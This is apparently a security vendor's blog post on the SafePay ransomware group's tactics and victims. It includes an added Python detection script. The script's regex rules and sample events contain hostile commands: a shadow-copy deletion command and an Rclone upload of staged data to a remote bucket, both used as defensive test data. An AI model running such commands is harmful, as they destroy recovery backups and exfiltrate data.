SafePay Hits 260 Victims

A dramatic surge in ransomware activity has emerged in 2025. The SafePay group, first observed in late 2024, has quietly established itself as one of the most aggressive ransomware operations currently active. With more than 260 known victims across the US, Europe, APAC, and Latin America, SafePay is now leveraging double-extortion tactics: encrypting data and threatening to leak it.

What Happened at Ingram Micro

One of the largest victims, Ingram Micro, reportedly had 3.5TB of sensitive data exfiltrated. Although operations were restored quickly, the threat to leak confidential files underscores the power ransomware actors now wield.

SafePay’s Attack Strategy
  • Gains initial access through exposed RDP/VPN, stolen credentials, or misconfigurations
  • Disables security tools and deletes shadow copies
  • Uses tools like ShareFinder.ps1, Rclone, and 7-Zip for data theft
  • Operates independently (not RaaS), making attribution and takedown more difficult
  • Targets: Manufacturing, technology, education, healthcare, logistics, finance

What This Means for You

This attack shows why ransomware groups now prioritize supply chains and service providers. Their intent is to disrupt critical operations and force compliance through fear of exposure.

Organizations should:

  • Harden remote access
  • Enforce MFA
  • Monitor for suspicious process behavior
  • Build offsite and immutable backups
  • Prepare a ransomware response playbook
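
To make "monitor for suspicious process behavior" concrete, here is an added example (not from the original article or COE Security) that matches process-creation command lines against the tools listed under SafePay's attack strategy and escalates a host when archive staging is followed by an Rclone transfer. The event fields, hosts, paths, the one-hour window and the shadow-copy command patterns are assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Rule name -> pattern over the process command line. ShareFinder.ps1, Rclone
# and 7-Zip are named in the article; the shadow-copy commands are an
# assumption (standard Windows utilities, not taken from the article).
RULES = {
    "share_discovery": re.compile(r"sharefinder\.ps1", re.I),
    "archive_staging": re.compile(r"\b7z[ar]?(\.exe)?\b.*\sa\s", re.I),
    "rclone_transfer": re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I),
    "shadow_copy_delete": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|shadowcopy\s+delete", re.I),
}
WINDOW = timedelta(hours=1)  # assumed correlation window, tune per environment

def triage(events):
    """Match rules per event, then score each host on the combination seen."""
    hits = defaultdict(list)
    for ev in events:
        ts = datetime.fromisoformat(ev["time"])
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                hits[ev["host"]].append((ts, name))
    report = {}
    for host, seen in hits.items():
        seen.sort()
        staged = [t for t, n in seen if n == "archive_staging"]
        sent = [t for t, n in seen if n == "rclone_transfer"]
        # Archive creation followed by an Rclone transfer inside the window
        chain = any(timedelta(0) <= s - a <= WINDOW for a in staged for s in sent)
        destructive = any(n == "shadow_copy_delete" for _, n in seen)
        report[host] = {"rules": [n for _, n in seen],
                        "severity": "high" if chain or destructive else "medium"}
    return report

# Constructed sample process-creation events (hosts, paths and times invented).
SAMPLE = [
    {"host": "FS01", "time": "2025-07-01T02:10:00", "cmd": r"powershell.exe -File C:\Temp\ShareFinder.ps1"},
    {"host": "FS01", "time": "2025-07-01T02:40:00", "cmd": r"7z.exe a C:\Temp\out.7z D:\Shares\Finance"},
    {"host": "FS01", "time": "2025-07-01T02:55:00", "cmd": r"rclone.exe copy C:\Temp\out.7z remote:bucket"},
    {"host": "FS01", "time": "2025-07-01T03:05:00", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS07", "time": "2025-07-01T09:00:00", "cmd": r"7z.exe x C:\Downloads\drivers.7z"},
    {"host": "WS07", "time": "2025-07-01T09:05:00", "cmd": "rclone.exe version"},
    {"host": "BK02", "time": "2025-07-01T11:00:00", "cmd": r"7z.exe a D:\Backups\nightly.7z D:\Data"},
]

if __name__ == "__main__":
    for host, result in triage(SAMPLE).items():
        print(host, result["severity"], result["rules"])
```

A lone archive job (BK02) stays at medium because 7-Zip and Rclone are also legitimate admin tools; it is the staging-then-transfer sequence or shadow-copy deletion that raises a host to high.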

Conclusion

SafePay’s rapid evolution proves that ransomware is no longer just about encryption; it is about leverage, disruption, and reputational damage. It is time to treat ransomware as an enterprise-level risk.

About COE Security

At COE Security, we help secure organizations in manufacturing, technology, logistics, healthcare, education, and MSP sectors against high-impact threats like SafePay.

We offer:

  • Vulnerability assessments
  • Remote access and endpoint hardening
  • SIEM tuning and anomaly detection
  • Immutable backup strategy design
  • Incident response and compliance readiness (NIST, HIPAA, GDPR, ISO 27001)

Our mission is to keep you secure, resilient, and always prepared.
